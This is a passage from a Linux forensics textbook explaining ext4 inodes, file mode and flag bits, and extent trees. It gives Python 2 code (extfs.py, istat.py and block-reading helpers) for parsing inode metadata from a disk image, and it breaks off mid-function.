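To make the split of the extra field concrete, here is a short Python 3 sketch that combines a 32-bit seconds value with its extra field. The function name is hypothetical. It assumes the 32-bit seconds value is interpreted as a signed number, which is what yields the 2446 limit mentioned above; treat this as an illustration of the bit layout rather than a definitive decoder.

```python
def decode_ext4_timestamp(seconds32, extra32):
    """Combine 32-bit seconds with the ext4 extra field.

    Returns (seconds since epoch, nanoseconds). The lower two bits of
    extra32 extend the seconds counter; the upper thirty hold nanoseconds.
    """
    # assumption: interpret the stored seconds as a signed 32-bit value
    if seconds32 >= 0x80000000:
        seconds32 -= 0x100000000
    epoch_bits = extra32 & 0x3        # lower two bits
    nanoseconds = extra32 >> 2        # upper thirty bits
    seconds = seconds32 + (epoch_bits << 32)
    return seconds, nanoseconds


if __name__ == "__main__":
    # sample values chosen for illustration only
    print(decode_ext4_timestamp(1436745600, 123456789 << 2))
    print(decode_ext4_timestamp(1436745600, (5 << 2) | 1))
```

The second call shows the effect of an epoch bit: the same stored seconds value lands 2 to the 32nd power seconds later.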
There are a number of special inodes. These are summarized in Table 7.7. Of the inodes listed, the root directory (inode 2) and journal (inode 8) are some of the more important ones for forensic investigators.
Table 7.7. Special purpose inodes.
Inode  Special Purpose
0      No such inode, numbering starts at 1
1      Defective block list
2      Root directory
3      User quotas
4      Group quotas
5      Boot loader
6      Undelete directory
7      Reserved group descriptors (for resizing filesystem)
8      Journal
9      Exclude inode (for snapshots)
10     Replica inode
11     First non-reserved inode (often lost+found)
Reading inodes with Python
Once again we turn to Python in order to easily interpret the inode data. To accomplish this we will add a new Inode class to our ever-expanding extfs.py file. The new class and helper functions follow.
"""
This helper function parses the mode bitvector
stored in an inode. It accepts a 16-bit mode
bitvector and returns a list of strings.
"""
def getInodeModes(mode):
    retVal = []
    if mode & 0x1:
        retVal.append("Others Exec")
    if mode & 0x2:
        retVal.append("Others Write")
    if mode & 0x4:
        retVal.append("Others Read")
    if mode & 0x8:
        retVal.append("Group Exec")
    if mode & 0x10:
        retVal.append("Group Write")
    if mode & 0x20:
        retVal.append("Group Read")
    if mode & 0x40:
        retVal.append("Owner Exec")
    if mode & 0x80:
        retVal.append("Owner Write")
    if mode & 0x100:
        retVal.append("Owner Read")
    if mode & 0x200:
        retVal.append("Sticky Bit")
    if mode & 0x400:
        retVal.append("Set GID")
    if mode & 0x800:
        retVal.append("Set UID")
    return retVal

"""
This helper function parses the mode bitvector
stored in an inode in order to get file type.
It accepts a 16-bit mode bitvector and
returns a string.
"""
def getInodeFileType(mode):
    fType = (mode & 0xf000) >> 12
    if fType == 0x1:
        return "FIFO"
    elif fType == 0x2:
        return "Char Device"
    elif fType == 0x4:
        return "Directory"
    elif fType == 0x6:
        return "Block Device"
    elif fType == 0x8:
        return "Regular File"
    elif fType == 0xA:
        return "Symbolic Link"
    elif fType == 0xc:
        return "Socket"
    else:
        return "Unknown Filetype"

"""
This helper function parses the flags bitvector
stored in an inode. It accepts a 32-bit flags
bitvector and returns a list of strings.
"""
def getInodeFlags(flags):
    retVal = []
    if flags & 0x1:
        retVal.append("Secure Deletion")
    if flags & 0x2:
        retVal.append("Preserve for Undelete")
    if flags & 0x4:
        retVal.append("Compressed File")
    if flags & 0x8:
        retVal.append("Synchronous Writes")
    if flags & 0x10:
        retVal.append("Immutable File")
    if flags & 0x20:
        retVal.append("Append Only")
    if flags & 0x40:
        retVal.append("Do Not Dump")
    if flags & 0x80:
        retVal.append("Do Not Update Access Time")
    if flags & 0x100:
        retVal.append("Dirty Compressed File")
    if flags & 0x200:
        retVal.append("Compressed Clusters")
    if flags & 0x400:
        retVal.append("Do Not Compress")
    if flags & 0x800:
        retVal.append("Encrypted Inode")
    if flags & 0x1000:
        retVal.append("Directory Hash Indexes")
    if flags & 0x2000:
        retVal.append("AFS Magic Directory")
    if flags & 0x4000:
        retVal.append("Must Be Written Through Journal")
    if flags & 0x8000:
        retVal.append("Do Not Merge File Tail")
    if flags & 0x10000:
        retVal.append("Directory Entries Written Synchronously")
    if flags & 0x20000:
        retVal.append("Top of Directory Hierarchy")
    if flags & 0x40000:
        retVal.append("Huge File")
    if flags & 0x80000:
        retVal.append("Inode uses Extents")
    if flags & 0x200000:
        retVal.append("Large Extended Attribute in Inode")
    if flags & 0x400000:
        retVal.append("Blocks Past EOF")
    if flags & 0x1000000:
        retVal.append("Inode is Snapshot")
    if flags & 0x4000000:
        retVal.append("Snapshot is being Deleted")
    if flags & 0x8000000:
        retVal.append("Snapshot Shrink Completed")
    if flags & 0x10000000:
        retVal.append("Inline Data")
    if flags & 0x80000000:
        retVal.append("Reserved for Ext4 Library")
    if flags & 0x4bdfff:
        retVal.append("User-visible Flags")
    if flags & 0x4b80ff:
        retVal.append("User-modifiable Flags")
    return retVal

"""
This helper function will convert an inode
number to a block group and index within the
block group.
Usage: [bg, index] = getInodeLoc(inodeNo, inodesPerGroup)
"""
def getInodeLoc(inodeNo, inodesPerGroup):
    bg = (int(inodeNo) - 1) / int(inodesPerGroup)
    index = (int(inodeNo) - 1) % int(inodesPerGroup)
    return [bg, index]

"""
Class Inode. This class stores extended filesystem
inode information in an orderly manner and provides
a helper function for pretty printing. The constructor accepts
a packed string containing the inode data and inode size
which is defaulted to 128 bytes as used by ext2 and ext3.
For inodes > 128 bytes the extra fields are decoded.
Usage: inode = Inode(dataInPackedString, inodeSize)
inode.prettyPrint()
"""
class Inode():
    def __init__(self, data, inodeSize=128):
        # store both the raw mode bitvector and interpretation
        self.mode = getU16(data)
        self.modeList = getInodeModes(self.mode)
        self.fileType = getInodeFileType(self.mode)
        self.ownerID = getU16(data, 0x2)
        self.fileSize = getU32(data, 0x4)
        # get times in seconds since epoch
        # note: these will rollover in 2038 without extra
        # bits stored in the extra inode fields below
        self.accessTime = time.gmtime(getU32(data, 0x8))
        self.changeTime = time.gmtime(getU32(data, 0xC))
        self.modifyTime = time.gmtime(getU32(data, 0x10))
        self.deleteTime = time.gmtime(getU32(data, 0x14))
        self.groupID = getU16(data, 0x18)
        self.links = getU16(data, 0x1a)
        self.blocks = getU32(data, 0x1c)
        # store both the raw flags bitvector and interpretation
        self.flags = getU32(data, 0x20)
        self.flagList = getInodeFlags(self.flags)
        # first OSD: inode version for filesystems created by Linux
        self.osd1 = getU32(data, 0x24)
        # store the 15 values from the block array
        # note: these may not be actual blocks if
        # certain features like extents are enabled
        self.block = []
        for i in range(0, 15):
            self.block.append(getU32(data, 0x28 + i * 4))
        self.generation = getU32(data, 0x64)
        # the most common extended attributes are ACLs
        # but other EAs are possible
        self.extendAttribs = getU32(data, 0x68)
        self.fileSize += pow(2, 32) * getU32(data, 0x6c)
        # these are technically only correct for Linux ext4 filesystems
        # should probably verify that that is the case
        self.blocks += getU16(data, 0x74) * pow(2, 32)
        self.extendAttribs += getU16(data, 0x76) * pow(2, 32)
        # owner and group IDs have 16-bit lower halves, so the
        # upper halves are shifted by 16 bits (not 32)
        self.ownerID += getU16(data, 0x78) * pow(2, 16)
        self.groupID += getU16(data, 0x7a) * pow(2, 16)
        self.checksum = getU16(data, 0x7c)
        # ext4 uses 256 byte inodes on the disk
        # as of July 2015 the logical size is 156 bytes
        # the first word is the size of the extra info
        if inodeSize > 128:
            self.inodeSize = 128 + getU16(data, 0x80)
            # this is the upper word of the checksum
            if self.inodeSize > 0x82:
                self.checksum += getU16(data, 0x82) * pow(2, 16)
            # these extra bits give nanosecond accuracy of timestamps
            # the lower 2 bits are used to extend the 32-bit seconds
            # since the epoch counter to 34 bits
            # if you are still using this script in 2038 you should
            # adjust this script accordingly :-)
            if self.inodeSize > 0x84:
                self.changeTimeNanosecs = getU32(data, 0x84) >> 2
            if self.inodeSize > 0x88:
                self.modifyTimeNanosecs = getU32(data, 0x88) >> 2
            if self.inodeSize > 0x8c:
                self.accessTimeNanosecs = getU32(data, 0x8c) >> 2
            if self.inodeSize > 0x90:
                self.createTime = time.gmtime(getU32(data, 0x90))
                self.createTimeNanosecs = getU32(data, 0x94) >> 2
            else:
                self.createTime = time.gmtime(0)

    def prettyPrint(self):
        for k, v in sorted(self.__dict__.iteritems()):
            print k + ":", v
The first three helper functions are straightforward. The line return [bg, index] in getInodeLoc is the Python way of returning more than one value from a function. We have returned lists (usually of strings) before, but the syntax here is slightly different.
There is something new in the Inode class. When interpreting the extra timestamp bits, the right shift operator (>>) has been used. Writing x >> y causes the bits in x to be shifted y places to the right. By shifting everything two bits to the right we discard the lower two bits, which are used to extend the seconds counter (which should not be a problem until 2038), and effectively divide our 32-bit value by four. The shift operators are very fast and efficient. Incidentally, the left shift operator (<<) is used to shift bits the other direction (multiplication).
A script named istat.py has been created. Its functionality is similar to that of the istat utility from The Sleuth Kit. It expects an image file, offset to the start of a filesystem in sectors, and an inode number as inputs. The script follows.
#!/usr/bin/python
#
# istat.py
#
# This is a simple Python script that will
# print out metadata in an inode from an ext2/3/4 filesystem inside
# of an image file.
#
# Developed for PentesterAcademy
# by Dr. Phil Polstra (@ppolstra)
import extfs
import sys
import os.path
import subprocess
import struct
import time
from math import log

def usage():
    print("usage " + sys.argv[0] + \
        " <image file> <offset> <inode number>\n" +
        "Displays inode information from an image file")
    exit(1)

def main():
    # three arguments are required: image file, offset, and inode number
    if len(sys.argv) < 4:
        usage()
    # make sure the image file exists
    if not os.path.isfile(sys.argv[1]):
        print("File " + sys.argv[1] + " cannot be opened for reading")
        exit(1)
    emd = extfs.ExtMetadata(sys.argv[1], sys.argv[2])
    # get inode location
    inodeLoc = extfs.getInodeLoc(sys.argv[3], \
        emd.superblock.inodesPerGroup)
    offset = emd.bgdList[inodeLoc[0]].inodeTable \
        * emd.superblock.blockSize + \
        inodeLoc[1] * emd.superblock.inodeSize
    with open(str(sys.argv[1]), 'rb') as f:
        f.seek(offset + int(sys.argv[2]) * 512)
        data = str(f.read(emd.superblock.inodeSize))
    inode = extfs.Inode(data, emd.superblock.inodeSize)
    print "Inode %s in Block Group %s at index %s" % (str(sys.argv[3]), \
        str(inodeLoc[0]), str(inodeLoc[1]))
    inode.prettyPrint()

if __name__ == "__main__":
    main()
In this script we have imported the extfs.py file with the line import extfs. Notice that there is no file extension in the import statement. The script is straightforward. We see the typical usage function that is called if insufficient parameters are passed into the script. An extended metadata object is created, then the location of the inode in question is calculated. Once the location is known, the inode data is retrieved from the file and used to create an inode object which is printed to the screen. Notice that "extfs." must be prepended to the function names now that we are calling code outside of the current file. We could avoid this by changing the import statement to from extfs import *, but I did not do so as I feel having the "extfs." makes the code clearer.
Results of running this new script against one of the interesting inodes from the PFE subject system image are shown in Figure 7.21. A couple of things about this inode should be noted. First, the flags indicate that this inode uses extents, which means the block array has a different interpretation (more about this later in this chapter). Second, this inode contains a creation time. Because this is a new field only available in ext4 filesystems, many tools, including those for altering timestamps, do not change this field. Obviously, this unaltered timestamp is good data for the forensic investigator. Now that we have learned about the generic inodes, we are ready to move on to a discussion of some inode extensions that will be present if the filesystem has certain features enabled.
FIGURE 7.21
Results of running istat.py on an inode associated with a rootkit on the PFE subject system.
Inode extensions and details
You may have noticed from the script in the previous section that the file mode bit vector in the inode contains more than just the file mode. In addition to the standard mode information which may be changed via the chmod command, the type of file is also stored. The file mode bit vector is summarized in Table 7.8.
Table 7.8. File mode bit vector from the inode. The file type items (bits 15 through 12) are mutually exclusive.
Bit  Meaning
15   Regular, or Symlink w/ Bit 13, or Socket w/ Bit 14
14   Directory, or Block Dev w/ Bit 13
13   Char Device, or Block Dev w/ Bit 14
12   FIFO
11   Set UID
10   Set GID
9    Sticky Bit
8    Owner Read
7    Owner Write
6    Owner Execute
5    Group Read
4    Group Write
3    Group Execute
2    Others Read
1    Others Write
0    Others Execute
Upon examining Table 7.8, the lower twelve bits should look familiar as all of these modes may be changed via the standard Linux chmod (change mode) command. These file modes are not mutually exclusive. The upper four bits are used to specify the file type. Each file is allowed only one type. The file types are broken out in Table 7.9.
Table 7.9. Decoding the file type from the upper four bits of the inode file mode.
                   Bit from Inode File Mode
Meaning            15  14  13  12
FIFO (pipe)        0   0   0   1
Character Device   0   0   1   0
Directory          0   1   0   0
Block Device       0   1   1   0
Regular File       1   0   0   0
Symbolic Link      1   0   1   0
Socket             1   1   0   0
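The two tables above can be turned into a few lines of code. The sketch below is only an illustration: the names FILE_TYPES and describe_mode are invented here (extfs.py has its own getInodeFileType and getInodeModes helpers), and for brevity the SetUID, SetGID, and sticky bits are ignored.

```python
# file type values taken from the upper four bits (Table 7.9)
FILE_TYPES = {
    0x1: "FIFO (pipe)",
    0x2: "Character Device",
    0x4: "Directory",
    0x6: "Block Device",
    0x8: "Regular File",
    0xA: "Symbolic Link",
    0xC: "Socket",
}


def describe_mode(mode):
    """Return (file type, permission string) for a 16-bit inode mode."""
    ftype = FILE_TYPES.get(mode >> 12, "Unknown")
    perms = ""
    # bits 8 through 0 are rwx for owner, group, and others
    for bit, letter in zip(range(8, -1, -1), "rwxrwxrwx"):
        perms += letter if mode & (1 << bit) else "-"
    return ftype, perms


print(describe_mode(0x81A4))  # octal 0100644
print(describe_mode(0x41ED))  # octal 040755
```

Because the file type is a four-bit value rather than four independent flags, a dictionary lookup on mode >> 12 is enough to decode it.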
The inode contains a 32-bit bit vector of flags. The lower word of flags is summarized in Table 7.10. Some flags may lack operating system support. Investigators familiar with Windows may know that there is a registry flag, HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\NtfsDisableLastAccessUpdate, which can be used to disable access time updating on NTFS directories. Bit 7, no access time updating, provides a similar function on an extended filesystem, but at the individual file or directory level.
Table 7.10. Lower word of inode flags.
Bit  Meaning
15   File tail not merged
14   Data written through journal
13   AFS Magic
12   Directory has hash indexes
11   Encrypted Inode
10   Don't compress file
9    Compressed clusters
8    Dirty compressed file
7    No access time updating
6    No Dump
5    Append Only
4    File is immutable
3    Synchronous Writes
2    File is compressed
1    Preserve for undelete
0    Secure Deletion
The high word of inode flags is summarized in Table 7.11. Most of these flags only make sense in the context of ext4 optional features. Bit 28, inode has inline data, is used to store very small files entirely within the inode. The first 60 bytes are stored in the block array (which is not needed to store blocks). If the file grows beyond 60 bytes up to about 160 bytes, bytes 60 and up are stored in the space between inodes (currently 100 bytes). If the file exceeds 160 bytes, all of the data is moved to a regular block.
Table 7.11. Upper word of inode flags.
Bit  Meaning
31   Reserved for Ext4 library
30   Unused
29   Unused
28   Inode has inline data
27   Snapshot shrink completed
26   Snapshot is being deleted
25   Unused
24   Inode is snapshot
23   Unused
22   Blocks past end of file (deprecated)
21   Inode stores large extended attribute
20   Unused
19   Inode uses extents
18   Huge File
17   Top of directory
16   Directory entry sync writes
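Testing for a flag is a matter of masking the bit vector with a one shifted to the right position. The following sketch decodes only a handful of the flags from Table 7.10 and Table 7.11. The dictionary INODE_FLAGS and the function decode_flags are hypothetical names used for this example; our extfs.py file already has a fuller getInodeFlags helper.

```python
# a few of the flag bits from Table 7.10 and Table 7.11
INODE_FLAGS = {
    4: "File is immutable",
    5: "Append Only",
    7: "No access time updating",
    12: "Directory has hash indexes",
    19: "Inode uses extents",
    28: "Inode has inline data",
}


def decode_flags(flags):
    """Return the names of the known flags set in a 32-bit bit vector."""
    return [name for bit, name in sorted(INODE_FLAGS.items())
            if flags & (1 << bit)]


# 0x80080 has bit 19 (extents) and bit 7 (no access time updating) set
print(decode_flags(0x80080))
```

Note that 1 << 19 is 0x80000, the same mask the Inode class uses to decide whether the block array holds an extent tree.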
Huge files specify their size in clusters, not blocks. The cluster size is stored in the superblock when huge files are present on a filesystem. Huge files require the Extents feature. Extents will be discussed in detail later in this chapter. Like in-line data, extents use the 60 bytes in the block array for a different purpose. We have said that an inode is the keeper of file metadata. In the next section we will discuss how to retrieve a file based on information stored in the inode.
Going from an inode to a file
We have discussed the fifteen entries in the block array and how they are used to specify data blocks which house a file. We have also seen that these sixty bytes may be repurposed for certain cases. If the inode stores a symbolic link and the target is less than sixty bytes long, it will be stored in the block array. If the in-line data flag is set, the first sixty bytes of a file are in this space. We have also mentioned that extents use this space differently.
When parsing an inode for the list of blocks contained in a file (or directory) in the most generic situation (i.e. no extents), we read the first twelve entries in the block array and add any non-zero values to our list of blocks. If the thirteenth entry is non-zero, we read in the block with the address stored there, which contains a list of up to 1024 blocks. Any non-zero entries from the data block are added to our list. With 4 kilobyte blocks this allows files as large as 4 megabytes + 48 kilobytes to be handled.
If there is an entry in the fourteenth block array item, we load the specified data block which contains a list of data blocks which in turn contain lists of data blocks. There are up to 1024 * 1024 entries in this doubly indirect level, all of which point to 4 kilobyte blocks, which allows files as large as 4 gigabytes + 4 megabytes + 48 kilobytes to be handled. If this is still not enough, the last entry is for a triply indirect block which permits files as large as 4 terabytes + 4 gigabytes + 4 megabytes + 48 kilobytes, at least in theory. If you have an ext4 filesystem, it is much more likely to use extents which are discussed in the next section.
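The size limits quoted above are easy to verify. The short sketch below works out the cumulative maximum file size at each level of indirection. The function name max_file_sizes is made up for this example, and a 4 kilobyte block size with 4-byte block addresses is assumed.

```python
def max_file_sizes(block_size=4096):
    """Return cumulative maximum file sizes in bytes for each level."""
    per_block = block_size // 4   # 32-bit block addresses per block
    direct = 12 * block_size
    single = per_block * block_size
    double = per_block ** 2 * block_size
    triple = per_block ** 3 * block_size
    return [direct,
            direct + single,
            direct + single + double,
            direct + single + double + triple]


labels = ["direct", "singly indirect", "doubly indirect", "triply indirect"]
for label, size in zip(labels, max_file_sizes()):
    print("%-16s %d bytes" % (label, size))
```

Each additional level multiplies the number of addressable blocks by 1024, which is why the limits step from kilobytes to megabytes, gigabytes, and terabytes.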
Extents
The system for storing lists of data blocks described in the previous section is fine when most files are small. When file sizes are measured in megabytes, gigabytes, or terabytes, performance quickly becomes an issue, however. To be fair, the Linux extended filesystem has been around for decades and yet is perfectly acceptable as is for many users. The elegant solution to improve performance for large files is the use of extents.
Extents store lists of contiguous blocks in a tree structure. Those familiar with NTFS will know that it uses a list of data runs (contiguous clusters) in a similar manner. As with most things in Linux, storing block lists in a tree is much more efficient than the simple list used in Windows. Three types of structures are required to build an extent tree. Every extent tree node must have a header that indicates what is stored in the node. The top node of a tree is often referred to as the root node. The root node header is always stored at the start of the inode block array. All non-empty extent trees must have at least one leaf node which is called an extent (which is essentially equivalent to the NTFS data run). There may be middle nodes between the root node and leaf nodes which are called indexes. All three types of structures have a length of 12 bytes, which allows the root node header plus four entries to be stored in the inode block array.
The extent header is summarized in Table 7.12. The header begins with a magic number which is a double-check that what follows is not a traditional direct data block entry. If the depth is zero, the entries that follow the header in this node are leaf nodes (extents). Otherwise the entries are for index (middle) nodes. If you work out the math, storing the largest file supported by ext4 should never require more than five levels in the tree.
Table 7.12. Extent header format.
Offset  Size  Name         Description
0x0     2     Magic        Magic number 0xF30A
0x2     2     Entries      Entries that follow the header
0x4     2     Max Entries  Maximum number of entries that might follow header
0x6     2     Depth        0 = this node points to data blocks; 1-5 = this node points to other extents
0x8     4     Generation   Generation of the tree
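To make the layout in Table 7.12 concrete, here is a small sketch that unpacks a header with the standard struct module rather than the getU16 and getU32 helpers from extfs.py. The function parse_extent_header and the sample bytes are invented for this example. Values are stored little-endian on disk.

```python
import struct

EXTENT_MAGIC = 0xF30A


def parse_extent_header(data):
    """Unpack the 12-byte extent header described in Table 7.12."""
    magic, entries, max_entries, depth, generation = \
        struct.unpack_from("<HHHHI", data, 0)
    if magic != EXTENT_MAGIC:
        raise ValueError("not an extent header")
    return {"entries": entries, "max": max_entries,
            "depth": depth, "generation": generation}


# hypothetical header: one entry, room for four, depth zero
sample = struct.pack("<HHHHI", 0xF30A, 1, 4, 0, 0)
print(parse_extent_header(sample))
```

Checking the magic number first is a cheap way to avoid misreading a traditional block array as an extent tree.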
The extent index node entry is summarized in Table 7.13. The block in the first field is a logical block number (the file is contained in logical block zero through total blocks minus one). For those familiar with NTFS, this is similar to a Virtual Cluster Number (VCN). The only real data in an index node is a 48-bit block address for the node one level lower in the tree.
Table 7.13. Extent index format.
Offset  Size  Name     Description
0x0     4     Block    This node covers block x and following
0x4     4     Leaf lo  Lower 32 bits of block containing the node (leaf or another index) one level lower in tree
0x8     2     Leaf hi  Upper 16 bits of the block described above
0xA     2     Unused   Padding to 12 byte size
The extent (leaf) node entry is summarized in Table 7.14. As with the index node, the first field is a logical block number. This is followed by a length. This length is normally less than 32,768. However, if uninitialized blocks are supported on this filesystem (say with the lazy block group feature), a value greater than 32,768 indicates that the extent consists of (length - 32,768) uninitialized data blocks. This is not common. The extent ends with a 48-bit data block address for the first block in this extent.
Table 7.14. Extent node format.
Offset  Size  Name      Description
0x0     4     Block     First block covered by this extent
0x4     2     Len       If <= 32768, initialized blocks in extent; if > 32768, extent is (len - 32768) uninit blocks
0x6     2     Start hi  Upper 16 bits of the starting block
0x8     4     Start lo  Lower 32 bits of the starting block
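The sketch below shows one way the leaf entry from Table 7.14 might be decoded, including the uninitialized case and the 48-bit starting block. It uses the struct module directly, and the function name parse_extent and the sample values are assumptions made for this illustration only.

```python
import struct


def parse_extent(data):
    """Unpack a 12-byte extent (leaf) entry as laid out in Table 7.14."""
    block, length, start_hi, start_lo = struct.unpack_from("<IHHI", data, 0)
    initialized = length <= 32768
    if not initialized:
        length -= 32768                  # count of uninitialized blocks
    first = (start_hi << 32) | start_lo  # assemble the 48-bit address
    return {"logical": block, "length": length,
            "initialized": initialized,
            "first": first, "last": first + length - 1}


# hypothetical extent: 8 blocks starting at data block 33280
sample = struct.pack("<IHHI", 0, 8, 0, 33280)
print(parse_extent(sample))
```

Here the left shift does the same job as multiplying by pow(2, 32) in the Extent class.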
Based on what we have learned about extents, we can update our extfs.py and istat.py files to more accurately report what is stored in the inode block array when extents are being used. I should point out that if there are multiple levels in the extent tree, the entire tree will not be printed out; only the four entries from the inode block array will be included. The reason for this is that parsing a multi-level tree requires data blocks to be read. This is not as big of an issue as it might seem at first. Four leaf nodes storing 32,768 block extents permit files as large as 32,768 * 4 * 4096 or 536,870,912 bytes (512 MB) to be stored entirely within the inode block array. The following code, containing three small classes and a helper function, needs to be added to our extfs.py file.

"""
Class ExtentHeader. Parses the 12-byte extent
header that is present in every extent node
in a Linux ext4 filesystem inode with the extent
flag set. Accepts a 12-byte packed string.
Usage: eh = ExtentHeader(data)
       eh.prettyPrint()
"""
class ExtentHeader():
    def __init__(self, data):
        self.magic = getU16(data)
        self.entries = getU16(data, 0x2)
        self.max = getU16(data, 0x4)
        self.depth = getU16(data, 0x6)
        self.generation = getU32(data, 0x8)

    def prettyPrint(self):
        print("Extent depth: %s entries: %s max-entries: %s generation: %s" \
            % (self.depth, self.entries, self.max, self.generation))

"""
Class ExtentIndex. Represents a middle
or index node in an extent tree. Accepts
a 12-byte packed string containing the index.
Usage: ei = ExtentIndex(data)
       ei.prettyPrint()
"""
class ExtentIndex():
    def __init__(self, data):
        self.block = getU32(data)
        self.leafLo = getU32(data, 0x4)
        self.leafHi = getU16(data, 0x8)

    def prettyPrint(self):
        print("Index block: %s leaf: %s" \
            % (self.block, self.leafHi * pow(2, 32) + self.leafLo))

"""
Class Extent. Represents a leaf node
or extent in an extent tree. Accepts
a 12-byte packed string containing the extent.
Usage: ext = Extent(data)
       ext.prettyPrint()
"""
class Extent():
    def __init__(self, data):
        self.block = getU32(data)
        self.len = getU16(data, 0x4)
        self.startHi = getU16(data, 0x6)
        self.startLo = getU32(data, 0x8)

    def prettyPrint(self):
        print("Extent block: %s data blocks: %s - %s" \
            % (self.block, self.startHi * pow(2, 32) + self.startLo, \
            self.len + self.startHi * pow(2, 32) + self.startLo - 1))

"""
Function getExtentTree(data). This function
will get an extent tree from the passed in
packed string.
Note 1: Only the data passed into the function is
parsed. If the nodes are index nodes the tree is
not traversed.
Note 2: In the most common case the data passed in
will be the 60 bytes from the inode block array. This
permits files up to 512 MB to be stored.
"""
def getExtentTree(data):
    # first entry must be a header
    retVal = []
    retVal.append(ExtentHeader(data))
    if retVal[0].depth == 0:
        # leaf node
        for i in range(0, retVal[0].entries):
            retVal.append(Extent(data[(i + 1) * 12 : ]))
    else:
        # index nodes
        for i in range(0, retVal[0].entries):
            retVal.append(ExtentIndex(data[(i + 1) * 12 : ]))
    return retVal

This code uses no techniques that have not been covered in this book thus far. We must also modify the Inode class in order to handle the extents properly. The updated Inode class is shown in the following code. The new code handles the extents in the constructor and expands the prettyPrint method.

"""
Class Inode. This class stores extended filesystem
inode information in an orderly manner and provides
a helper function for pretty printing. The constructor accepts
a packed string containing the inode data and inode size
which is defaulted to 128 bytes as used by ext2 and ext3.
For inodes > 128 bytes the extra fields are decoded.
Usage inode = Inode(dataInPackedString, inodeSize)
      inode.prettyPrint()
"""
class Inode():
    def __init__(self, data, inodeSize=128):
        # store both the raw mode bitvector and interpretation
        self.mode = getU16(data)
        self.modeList = getInodeModes(self.mode)
        self.fileType = getInodeFileType(self.mode)
        self.ownerID = getU16(data, 0x2)
        self.fileSize = getU32(data, 0x4)
        # get times in seconds since epoch
        # note: these will rollover in 2038 without extra
        # bits stored in the extra inode fields below
        self.accessTime = time.gmtime(getU32(data, 0x8))
        self.changeTime = time.gmtime(getU32(data, 0xC))
        self.modifyTime = time.gmtime(getU32(data, 0x10))
        self.deleteTime = time.gmtime(getU32(data, 0x14))
        self.groupID = getU16(data, 0x18)
        self.links = getU16(data, 0x1a)
        self.blocks = getU32(data, 0x1c)
        # store both the raw flags bitvector and interpretation
        self.flags = getU32(data, 0x20)
        self.flagList = getInodeFlags(self.flags)
        # high 32-bits of generation for Linux
        self.osd1 = getU32(data, 0x24)
        # store the 15 values from the block array
        # note: these may not be actual blocks if
        # certain features like extents are enabled
        self.block = []
        self.extents = []
        if self.flags & 0x80000:
            self.extents = getExtentTree(data[0x28 : ])
        else:
            for i in range(0, 15):
                self.block.append(getU32(data, 0x28 + i * 4))
        self.generation = getU32(data, 0x64)
        # the most common extended attributes are ACLs
        # but other EAs are possible
        self.extendAttribs = getU32(data, 0x68)
        self.fileSize += pow(2, 32) * getU32(data, 0x6c)
        # these are technically only correct for Linux ext4 filesystems
        # should probably verify that that is the case
        self.blocks += getU16(data, 0x74) * pow(2, 32)
        self.extendAttribs += getU16(data, 0x76) * pow(2, 32)
        # the owner and group IDs are 16-bit values in the base inode,
        # so their upper halves are shifted 16 bits, not 32
        self.ownerID += getU16(data, 0x78) * pow(2, 16)
        self.groupID += getU16(data, 0x7a) * pow(2, 16)
        self.checksum = getU16(data, 0x7c)
        # ext4 uses 256 byte inodes on the disk
        # as of July 2015 the logical size is 156 bytes
        # the first word is the size of the extra info
        if inodeSize > 128:
            self.inodeSize = 128 + getU16(data, 0x80)
            # this is the upper word of the checksum
            if self.inodeSize > 0x82:
                self.checksum += getU16(data, 0x82) * pow(2, 16)
            # these extra bits give nanosecond accuracy of timestamps
            # the lower 2 bits are used to extend the 32-bit seconds
            # since the epoch counter to 34 bits
            # if you are still using this script in 2038 you should
            # adjust this script accordingly :-)
            if self.inodeSize > 0x84:
                self.changeTimeNanosecs = getU32(data, 0x84) >> 2
            if self.inodeSize > 0x88:
                self.modifyTimeNanosecs = getU32(data, 0x88) >> 2
            if self.inodeSize > 0x8c:
                self.accessTimeNanosecs = getU32(data, 0x8c) >> 2
            if self.inodeSize > 0x90:
                self.createTime = time.gmtime(getU32(data, 0x90))
                self.createTimeNanosecs = getU32(data, 0x94) >> 2
        else:
            self.createTime = time.gmtime(0)

    # note: calendar.timegm below requires that extfs.py contain
    # the line import calendar along with its other imports
    def prettyPrint(self):
        for k, v in sorted(self.__dict__.iteritems()):
            if k == 'extents' and self.extents:
                v[0].prettyPrint() # print header
                for i in range(1, v[0].entries + 1):
                    v[i].prettyPrint()
            elif k == 'changeTime' or k == 'modifyTime' or \
                k == 'accessTime' \
                or k == 'createTime':
                print k + ":", time.asctime(v)
            elif k == 'deleteTime':
                if calendar.timegm(v) == 0:
                    print 'Deleted: no'
                else:
                    print k + ":", time.asctime(v)
            else:
                print k + ":", v

The results of running istat.py with the updated extfs.py file are shown in Figure 7.22. The highlighted lines show what has been added.
FIGURE 7.22
Results of running istat.py against an inode associated with a rootkit on the PFE subject system. The highlighted lines show information about the extent used to store this file.
Now that we can read the block information for both traditional blocks and extents, a script to retrieve a file from its inode is easily created. The new script will be named icat.py. The Sleuth Kit provides a similar utility named icat. We will begin by adding two new helper functions to extfs.py. The new code follows.

# get a datablock from an image
def getDataBlock(imageFilename, offset, blockNo, blockSize=4096):
    with open(str(imageFilename), 'rb') as f:
        # the offset may arrive as a string from the command line
        f.seek(blockSize * blockNo + int(offset) * 512)
        data = str(f.read(blockSize))
    return data

"""
function getBlockList
This function will return a list of data blocks
if extents are being used this should be simple assuming
there is a single level to the tree.
For extents with multiple levels and for indirect blocks
additional "disk access" is required.
Usage: bl = getBlockList(inode, imageFilename, offset, blockSize)
where inode is the inode object, imageFilename is the name of a
raw image file, offset is the offset in 512 byte sectors to the
start of the filesystem, and blockSize (default 4096) is the
size of a data block.
"""
def getBlockList(inode, imageFilename, offset, blockSize=4096):
    # now get the data blocks and output them
    datablocks = []
    if inode.extents:
        # great we are using extents
        # extent zero has the header
        # check for depth of zero which is most common
        if inode.extents[0].depth == 0:
            for i in range(1, inode.extents[0].entries + 1):
                sb = inode.extents[i].startHi * pow(2, 32) + \
                    inode.extents[i].startLo
                eb = sb + inode.extents[i].len # really ends in this minus 1
                for j in range(sb, eb):
                    datablocks.append(j)
        else:
            # load this level of the tree
            currentLevel = inode.extents
            leafNode = []
            while currentLevel[0].depth != 0:
                # read the current level
                # nextLevel holds one header followed by every
                # index entry found one level lower in the tree
                nextLevel = []
                for i in range(1, len(currentLevel)):
                    blockNo = currentLevel[i].leafLo + \
                        currentLevel[i].leafHi * pow(2, 32)
                    currnode = getExtentTree(getDataBlock(imageFilename, \
                        offset, blockNo, blockSize))
                    if not nextLevel:
                        # keep one header so the depth test above works
                        nextLevel.append(currnode[0])
